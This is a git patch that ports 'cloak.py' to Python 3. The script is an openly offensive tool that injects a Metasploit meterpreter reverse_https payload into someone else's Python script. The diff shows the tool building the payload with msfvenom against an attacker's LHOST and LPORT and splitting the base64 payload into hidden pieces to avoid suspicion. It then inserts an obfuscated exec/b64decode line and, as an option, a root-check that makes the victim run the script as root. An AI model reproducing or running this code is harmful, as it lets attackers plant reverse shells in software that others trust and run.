From 36e872830774f533718cc622639f6e8679d3a7cb Mon Sep 17 00:00:00 2001 From: Somdev Sangwan Date: Sat, 3 Mar 2018 10:01:35 +0530 Subject: [PATCH] Added python3 support --- cloak.py | 68 +++++++++++++++++++++++++++++--------------------------- 1 file changed, 35 insertions(+), 33 deletions(-) diff --git a/cloak.py b/cloak.py index 1bff4d2..836afb9 100644 --- a/cloak.py +++ b/cloak.py @@ -5,6 +5,9 @@ import socket import sys from re import search +if sys.version_info < (3, 0): + input = raw_input + # Colors and shit like that white = '\033[1;97m' green = '\033[1;32m' @@ -17,13 +20,13 @@ good = '\033[1;32m[+]\033[1;m' run = '\033[1;97m[>]\033[1;m' # Banner -print '''%s +print ('''%s _________ %s__%s __ \%s_%s ___ \| | _________ | | __ / \ \/| | / %s_%s \__ \ | |/ / \ \___| |_( %s(_)%s ) %s__%s \| %s<%s \______ /____/\____(____ /__|_ \\ - %s\/%s \/ \/%s\n''' % (white, red, white, red, white, red, white, red, white, red, white, red, white, red, white, end) + %s\/%s \/ \/%s\n''' % (white, red, white, red, white, red, white, red, white, red, white, red, white, red, white, end)) # Connecting to google DNS and retrieving IP address of host s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -35,10 +38,10 @@ s.close() def check_external_dependency(command, help=None): check_command = os.system('command -v %s > /dev/null' % command) if check_command != 0: - print '%s%s Couldn\'t find %s!' % (bad, red, command) + print ('%s%s Couldn\'t find %s!' % (bad, red, command)) if help: - print '%s %s' % (info, help) - sys.exit(1) + print ('%s %s' % (info, help)) + quit() check_external_dependency( @@ -47,19 +50,19 @@ check_external_dependency( ) # Prompting the user for LHOST -choice = raw_input('%s %s%s%s : Use this as LHOST? [Y/n] ' % (que, green, LHOST, end)).lower() +choice = input('%s %s%s%s : Use this as LHOST? [Y/n] ' % (que, green, LHOST, end)).lower() if choice == 'n': - LHOST = raw_input('%s Enter LHOST: ' % que) + LHOST = input('%s Enter LHOST: ' % que) # Prompting the user for LPORT LPORT = '443' -choice = raw_input('%s %s%s%s : Use this as LPORT? [Y/n] ' % (que, green, LPORT, end)).lower() +choice = input('%s %s%s%s : Use this as LPORT? [Y/n] ' % (que, green, LPORT, end)).lower() if choice == 'n': - LPORT = raw_input('%s Enter LPORT: ' % que) + LPORT = input('%s Enter LPORT: ' % que) def import_choice(): - script = raw_input('%s Enter Github/File path: ' % que) + script = input('%s Enter Github/File path: ' % que) if 'https://github.com' in script: github(script) else: @@ -83,8 +86,8 @@ def github(script): if '.py' in line: # if a file contains .py python_files.append(line.strip('\n')) # adding the filename to python_files list if len(python_files) == 0: # if there are 0 python files - print '%s No python file found.' % bad - yes_no = raw_input('%s Would you like to manually select a file? [Y/n] ' % info).lower() + print ('%s No python file found.' % bad) + yes_no = input('%s Would you like to manually select a file? [Y/n] ' % info).lower() if yes_no == 'n': quit() else: @@ -95,23 +98,23 @@ def github(script): all_files.append(line.strip('\n')) # adding the filename to python_files list number = 1 for file in all_files: - print '%s. %s' % (number, file) # it will print all files like 1. main.py 2. run.sh 3. test.txt + print ('%s. %s' % (number, file)) # it will print all files like 1. main.py 2. run.sh 3. test.txt number = number + 1 - number = raw_input('%s Select a file to infect: ' % que) # asking the user to select a file to inject + number = input('%s Select a file to infect: ' % que) # asking the user to select a file to inject script = all_files[int(number) - 1] # just simple maths to select the chosen file from all_files list elif len(python_files) > 1: # if there are more than 1 python files - print '%s More than one python scripts found.' + print ('%s More than one python scripts found.') number = 1 for file in python_files: - print '%s. %s' % (number, file) # it will print all files like 1. main.py 2. run.py 3. test.py + print ('%s. %s' % (number, file)) # it will print all files like 1. main.py 2. run.py 3. test.py number = number + 1 - number = raw_input('%s Select a file to infect: ' % que) # asking the user to select a file to inject + number = input('%s Select a file to infect: ' % que) # asking the user to select a file to inject script = python_files[int(number) - 1] # just simple maths to select the chosen file from python_files list elif len(python_files) == 1: # if there's 1 python file script = python_files[0] # fetching the only element from the python_files list - print '%s Payload will be injected in %s%s%s' % (info, green, script, end) + print ('%s Payload will be injected in %s%s%s' % (info, green, script, end)) os.system('rm -r %s/%s/temp.txt' % (cwd, directory)) # removes the temp.txt cwd2 = os.chdir('%s/%s' % (cwd, directory)) # changes the working directory to the repo directory github = True @@ -120,7 +123,7 @@ def github(script): def injector(script): method = 'https' - print '%s Generating Payload' % run + print ('%s Generating Payload' % run) os.system("msfvenom -p python/meterpreter/reverse_%s -f raw --platform python -e generic/none -a python %s LPORT=%s > payload.txt" % (method, LHOST, LPORT)) payload = [] # a list containing with open('payload.txt', 'r+') as f: # opens payload.txt @@ -130,7 +133,7 @@ def injector(script): payload = ''.join(payload) # converts payload list into a string payload = payload.split("'") # converts the payload into a list by splitting it from the character ' base64_string = payload[3] # retrieves the third *coughs* the fourth element from the payload list - print '%s Injecting into %s%s%s' % (run, green, script, end) + print ('%s Injecting into %s%s%s' % (run, green, script, end)) injectable_lines = [] # Lines where payload pieces can be inserted safely imports = [] # lines that are being used to import libraries. Perfect for inserting 'import base64, sys' script_list = [] # list that contains all the lines of target script @@ -140,7 +143,7 @@ def injector(script): script_list.append(line.strip('\n')) # adds current line to the script_list match = search(r'^[a-zA-Z0-9]', line) # checks if the first character is an alphabet or digit match2 = search(r'^[\t]', line) - if match and not line.startswith('except') and not line.startswith('else') and not match2: + if match and not line.startswith('except') and not line.startswith('else') and not line.startswith('#') and not match2: injectable_lines.append(number - 1) # add the line to injectable_lines list if line.startswith('from') or line.startswith('import'): # if the line starts with from or import imports.append(number) # add that line to imports list @@ -149,9 +152,9 @@ def injector(script): number = number + 1 # increase the value of number by 1 f.close() # close the file if 'import base64, sys' in script_list: # searches for 'import base64. sys' in script_list - print '%s Seems like this file has been already injected by Cloak.' % bad + print ('%s Seems like this file has been already injected by Cloak.' % bad) if github: - choice = raw_input('%s Would you like to download a fresh copy? [Y/n]' % que).lower() + choice = input('%s Would you like to download a fresh copy? [Y/n]' % que).lower() if choice == 'n': pass else: @@ -161,7 +164,7 @@ def injector(script): cwd2 = os.chdir('%s/%s' % (cwd, directory)) # changes the working directory to the repo directory injector() # Calls the injector() function else: - print '%s Please use a fresh file for injection.' % info + print ('%s Please use a fresh file for injection.' % info) quit() while True: # its an infinite loop unless its broken manually # We can't insert all the pieces of payload in one place as it may raise suspicion so we will @@ -170,21 +173,21 @@ def injector(script): position_c, position_d = random.choice(injectable_lines), random.choice(injectable_lines) #lets make sure the positions of the pieces of payload are in a particular order otherwise it will raise error if position_a < position_b < position_c < position_d: - script_list.insert(position_a + 1, 'var1 = \'\'\'%s\'\'\'' % base64_string[:len(base64_string)/2]) #[:len(string)/2] will give the first half of a string - script_list.insert(position_b + 2, 'var2 = \'\'\'%s\'\'\'' % base64_string[len(base64_string)/2:]) #and insert.list() is used to insert a element in list - script_list.insert(position_c + 3, 'vars = var1 + var2') - script_list.insert(position_d + 4, 'try:\n\texec(base64.b64decode({2:str,3:lambda b:bytes(b,\'UTF-8\')}[sys.version_info[0]](vars)))\nexcept:\n\tpass') - root = raw_input('%s Ask victim to run injected script as root? [y/N] ' % que).lower() + script_list.insert(int(position_a + 1), 'var1 = \'\'\'%s\'\'\'' % base64_string[:int(len(base64_string)/2)]) #[:len(string)/2] will give the first half of a string + script_list.insert(int(position_b + 2), 'var2 = \'\'\'%s\'\'\'' % base64_string[int(len(base64_string)/2):]) #and insert.list() is used to insert a element in list + script_list.insert(int(position_c + 3), 'vars = var1 + var2') + script_list.insert(int(position_d + 4), 'try:\n\texec(base64.b64decode({2:str,3:lambda b:bytes(b,\'UTF-8\')}[sys.version_info[0]](vars)))\nexcept:\n\tpass') + root = input('%s Ask victim to run injected script as root? [y/N] ' % que).lower() if root == 'y': root = True if len(imports) < 1: # if there are no imports in the script if root: - script_list.insert(injectable_lines[0], 'import base64, sys, commands\nif (sys.platform.startswith("linux")) :\n\tif (commands.getoutput("whoami")) != "root" :\n\t\tprint ("%s needs to be run as root.")\n\t\tsys.exit()\n\telse:\n\t\tpass' % script) + script_list.insert(injectable_lines[0], 'import base64, sys, commands\nif (sys.platform.startswith("linux")) :\n\tif (commands.getoutput("whoami")) != "root" :\n\t\tprint ("%s needs to be run as root.")\n\t\tquit()\n' % script) else: script_list.insert(random.choice(imports), 'import base64, sys') else: if root: - script_list.insert(injectable_lines[0], 'import base64, sys, commands\nif (sys.platform.startswith("linux")) :\n\tif (commands.getoutput("whoami")) != "root" :\n\t\tprint ("%s needs to be run as root.")\n\t\tsys.exit()\n\telse:\n\t\tpass' % script) + script_list.insert(injectable_lines[0], 'import base64, sys, commands\nif (sys.platform.startswith("linux")) :\n\tif (commands.getoutput("whoami")) != "root" :\n\t\tprint ("%s needs to be run as root.")\n\t\tquit()\n' % script) else: script_list.insert(random.choice(imports), 'import base64, sys') break # breaks the loop as the payload has been injected @@ -195,7 +198,6 @@ def injector(script): f.write(line + '\n') # writes a line to the target script f.close() # closes the file os.system('rm payload.txt') # removes payload.txt - print '%s %s%s%s was successfully injected' % (good, green, script, end) - + print ('%s %s%s%s was successfully injected' % (good, green, script, end)) import_choice()